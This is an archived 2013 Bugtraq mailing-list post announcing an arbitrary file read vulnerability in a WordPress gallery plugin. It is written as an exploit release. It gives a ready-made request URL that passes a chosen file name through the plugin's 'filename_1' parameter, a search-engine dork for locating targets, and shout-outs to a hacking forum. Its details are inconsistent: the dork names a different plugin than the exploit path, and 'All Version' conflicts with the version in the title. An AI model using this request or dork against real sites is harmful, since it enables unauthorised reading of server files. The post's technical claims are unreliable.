lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201301101301.r0AD1IV3013415@sf01web2.securityfocus.com> Date: Thu, 10 Jan 2013 13:01:18 GMT From: Beni_vanda@...oo.com To: bugtraq@...urityfocus.com Subject: Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability a bug in Wordpress gallery-3.8.3 plugin that allows to us to occur a Arbitrary File Read on a Local machin ################################################################################​############## # # Exploit Title : Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability # # Author : IrIsT.Ir # # Discovered By : Beni_Vanda # # Home : http://IrIsT.Ir/forum/ # # Software Link : http://wordpress.org/extend/plugins/gallery-plugin/ # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : inurl:plugins/nextgen-gallery # ################################################################################​############## # # Expl0iTs : # # [Target]/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR] # # ################################################################################​############## # # Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - F@rid - dr.tofan # # and All Members In Www.IrIsT.Ir/forum # ################################################################################​##############
Powered by blists - more mailing lists